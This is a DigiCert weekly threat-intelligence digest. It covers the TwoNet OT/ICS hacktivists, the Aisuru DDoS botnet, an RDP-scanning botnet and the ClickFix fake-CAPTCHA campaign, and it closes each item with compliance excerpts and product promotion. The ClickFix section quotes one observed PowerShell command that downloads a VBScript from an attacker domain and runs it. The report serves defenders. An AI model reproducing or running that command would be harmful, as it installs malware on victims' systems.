DigiCert’s Open-Source Intelligence (OSINT) Report – October 10 – October 16, 2025

Pro-Russian Hacktivist Attacking OT/ICS Devices to Steal Login Credentials

(TLP: CLEAR) Recent intelligence reporting from Forescout analysts has uncovered a sophisticated cyber campaign by a newly identified pro-Russian hacktivist group dubbed, “TwoNet”. According to analysts, the group has successfully compromised operational technology and industrial control systems across multiple European critical infrastructure organizations. The group has targeted water treatment facilities, solar installations, and other industrial environments across multiple European countries, with particular focus on utilities and energy infrastructure in nations they consider adversarial. TwoNet’s campaign represents a significant escalation in hacktivist threat capabilities, with the threat actor’s malicious activities including database enumeration, system defacement, process disruption, and credential harvesting from internet-exposed OT/ICS devices. Additional intelligence gathering efforts utilizing sophisticated honeypot infrastructure successfully captured the group’s intrusion methodology, revealing the attackers’ expertise in exploiting default authentication mechanisms, utilizing SQL injection techniques, and leveraging known vulnerabilities in human-machine interface systems. Following successful database enumeration, the threat actors created a new user account named “BARLATI” and maintained access across multiple sessions spanning nearly 24 hours. TwoNet then exploited CVE-2021-26829 in order to inject malicious JavaScript code into the HMI login page, creating persistent defacement that would trigger alerts whenever administrators accessed the system.

(TLP: CLEAR) Comments: The emergence of TwoNet represents a concerning paradigm shift in the “hacktivist threat landscape”, where politically motivated actors are displaying technical capabilities traditionally reserved for nation-state advanced persistent threats. The group’s ability to maintain persistence while systematically enumerating database schemas and altering critical system configurations demonstrates not only technical sophistication but also operational discipline that suggests potential state sponsorship or access to advanced training resources. The targeting of water treatment facilities and energy infrastructure specifically aligns with broader Russian strategic objectives of disrupting Western critical infrastructure, suggesting these operations may serve dual purposes as both hacktivist demonstrations and reconnaissance for potential future state-sponsored operations.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “Malicious software (malware) is prevented or detected and addressed.

An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware. The deployed anti-malware solution(s): 

• Detects all known types of malware. 
• Removes, blocks, or contains all known types of malware.

Any system components that are not at risk for malware are evaluated periodically to include the following: 

• A documented list of all system components not at risk for malware. 
• Identification and evaluation of evolving malware threats for those system components. 
• Confirmation whether such system components continue to not require anti-malware protection.

The frequency of periodic evaluations of system components identified as not at risk for malware is defined in the entity’s targeted risk analysis, which is performed according to all elements specified in Requirement 12.3.1.

Section 5.2 lays out requirements for malware detection and blocking across all devices in the Cardholder Data Environment. Every device inside of the CDE should have malware protection that is updated, monitored, and actions taken when an infection is detected.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), functions as a recursive/resolver DNS server that receives DNS queries either via forwarding from on-network resolvers or via an endpoint client. It then uses blocklists, domain categories, artificial intelligence, or a defined policy to determine if the domain should be allowed or blocked. Blocked user traffic is then sent to a sinkhole.

Source: https://cybersecuritynews.com/pro-russian-hacktivist-attacking-ot-ics-devices/

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

(TLP: CLEAR) Recent reporting indicates the Aisuru botnet has achieved unprecedented Distributed Denial-of-Service (DDoS) capabilities, launching a record-breaking attack that reached 29.6 terabits per second on October 6, 2025, while drawing the majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on major U.S. Internet service providers. According to reporting, the Aisuru botnet is now drawing a majority of its firepower from compromised IoT devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, creating significant operational challenges for network defenders and ISPs attempting to mitigate collateral damage from the botnet’s massive attack campaigns. Since its arrival on the scene more than a year ago, the botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide. Aisuru’s evolution represents a dramatic escalation in DDoS capabilities, with recent attacks progressing from 6.35 Tbps in May 2025 to 11 Tbps days later, then topping 22 Tbps by late September before reaching the 29.6 Tbps. Furthermore, reporting suggests the botnet’s rapid expansion has been attributed to sophisticated propagation techniques and strategic timing in the DDoS ecosystem. Additionally, it was later reported that one of the Aisuru botmasters had compromised the firmware distribution website for Totolink, a maker of low-cost routers, allegedly exploiting a router firmware update server in April and distributing malicious scripts to expand the botnet’s scope. It appears that Aisuru’s current infrastructure is comprised of mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. 

(TLP: CLEAR) Comments: The Aisuru botnet represents a catastrophic failure of IoT security at scale, where the convergence of unpatched consumer devices, inadequate ISP egress filtering, and sophisticated botnet operations has created a wave of record-breaking DDoS capabilities. The heavy concentration of infected devices within U.S. ISP networks suggests that residential broadband infrastructure has become the unwitting backbone of global cybercriminal operations, with the sheer volume of compromised devices creating a situation where ISPs are struggling to maintain service quality for legitimate customers while their networks are weaponized against external targets. The progression from 6.35 Tbps to 29.6 Tbps attacks in just five months indicates an exponential growth trajectory that far outpaces the defensive capabilities of most organizations, effectively pricing smaller entities out of adequate DDoS protection.

(TLP: CLEAR) Recommended best practices/regulations: NIST Special Publication 800-189: “Distributed Denial-of-Service (DDoS) is a form attack where the attack traffic is generated from many distributed sources to achieve a high-volume attack and directed towards an intended victim (i.e., system or server). To conduct a direct DDoS attack, the attacker typically makes use of a few powerful computers or a vast number of unsuspecting, compromised third-party devices (e.g., laptops, tablets, cell phones, Internet of Things (IoT) devices, etc.). The latter scenario is often implemented through botnets. In many DDoS attacks, the IP source addresses in the attack messages are “spoofed” to avoid traceability.” 

(TLP: CLEAR) DigiCert: Digicert UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets whether they reside in the cloud, multi-cloud, data center, or hybrid. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks and be mitigated within seconds.

Source: https://krebsonsecurity.com/2025/10/ddos-botnet-aisuru-blankets-us-isps-in-record-ddos/

Massive Multi-Country Botnet Targets RDP Services in the US

(TLP: CLEAR) Threat intelligence firm GreyNoise has identified a large-scale, coordinated botnet operation targeting Remote Desktop Protocol (RDP) services across the United States, with the cyber campaign commencing on October 8, 2025, utilizing over 100,000 unique IP addresses originating from more than 100 countries. The sophisticated attack campaign demonstrates centralized command-and-control capabilities, with nearly all participating IP addresses sharing one similar TCP fingerprint, with only the Maximum Segment Size varying between different compromised botnet clusters indicating a single operator or group orchestrating the attacks across a globally distributed infrastructure. The investigation began after GreyNoise analysts detected an anomalous spike in traffic from Brazilian-geolocated IPs, which prompted a broader analysis that quickly uncovered similar surges in activity from Argentina, Iran, China, Mexico, Russia, and South Africa. The botnet employs two specific attack vectors to compromise vulnerable systems: RD Web Access timing attacks, where attackers measure the server’s response time to login attempts to differentiate between valid and invalid usernames anonymously, and RDP web client login enumeration, which systematically attempts to guess user credentials.

(TLP: CLEAR) Comments: The emergence of this massive RDP-targeting botnet represents a critical threat to enterprise remote access infrastructure at a time when hybrid work models have made RDP services essential for business continuity. The botnet’s ability to coordinate attacks from over 100,000 nodes across more than 100 countries while maintaining technical consistency through shared TCP fingerprints suggests either a highly sophisticated criminal operation or potential nation-state involvement seeking to map and compromise U.S. critical infrastructure.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “The Domain Name System (DNS) is central to the operation of modern networks, translating human-readable domain names into machine-usable Internet Protocol (IP) addresses. DNS makes navigating to a website, sending an email, or making a secure shell connection easier, and is a key component of the Internet’s resilience. As with many Internet protocols, DNS was not built to withstand abuse from bad actors’ intent on causing harm. ‘Protective DNS’ (PDNS) is different from earlier security-related changes to DNS in that it is envisioned as a security service – not a protocol – that analyzes DNS queries and takes action to mitigate threats, leveraging the existing DNS protocol and architecture.” 

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation. 

Source: https://www.bleepingcomputer.com/news/security/massive-multi-country-botnet-targets-rdp-services-in-the-us/

Hackers Registered 13,000+ Unique Domains and Leverages Cloudflare to Launch Clickfix Attacks

(TLP: CLEAR) Security researchers at Lab539 have recently identified a massive social engineering campaign dubbed, “ClickFix”, that has rapidly expanded to encompass over 13,000 malicious domains designed to manipulate users into executing malware on their own systems through fake CAPTCHA verification prompts. Emerging July 2025, ClickFix rapidly expanded its reach by registering over 13,000 unique domains designed to lure users into executing malicious commands on their own devices with a reported spike in mid-August, raising alarms across multiple threat-intelligence platforms. According to security researchers, 76% of the ClickFix infrastructure already existed in Adversary-in-the-Middle (AiTM) datasets, suggesting a proliferation of as-a-service adversarial tooling operating on top of a layer of compromised infrastructure with Cloudflare emerging as the single most prevalent hosting provider, shielding 24.4% (3,345 out of 13,695) of the detected malicious domains, while the campaign’s long tail of nearly 500 other providers reveals a strategic use of diverse infrastructure to evade simple blocklists. Researchers indicated that the core infection mechanism relies on leveraging the browser’s clipboard API to plant a command that the user unwittingly pastes into a terminal, with sites writing PowerShell command sequences to the clipboard after CAPTCHA completion. For instance, a typical payload example includes: “cmd /c start /min powershell -Command curl.exe -s hxxps://cf-unstable[.]mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs”, which downloads and executes a VBScript payload without further user interaction. Furthermore, the campaign’s infrastructure characteristics indicate automated provisioning and sophisticated operational security practices. The scale of domain registration suggested an automated provisioning pipeline, likely fueled by pay-as-you-go registrar services and resold hosting, rather than the manual setup favored by advanced persistent threat actors (APT). Additional analysis identified ClickFix campaigns abusing legitimate institutional domains, including academic (.edu, .ac) and government (.gov, .mil) resources, likely due to opportunistic compromises or poorly maintained DNS records.

(TLP: CLEAR) Comments: The aforementioned ClickFix campaign signifies a shift in social engineering attacks where threat actors have successfully weaponized the trust users place in routine security verification mechanisms like CAPTCHAs and browser security warnings. The ability to manipulate users into self-infection through clipboard manipulation eliminates many traditional security controls, as the malicious actions are performed directly by the user rather than through exploits or malicious downloads that would trigger security alerts.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.

Source: https://cybersecuritynews.com/patchwork-apt-using-powershell-commands/

Source: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/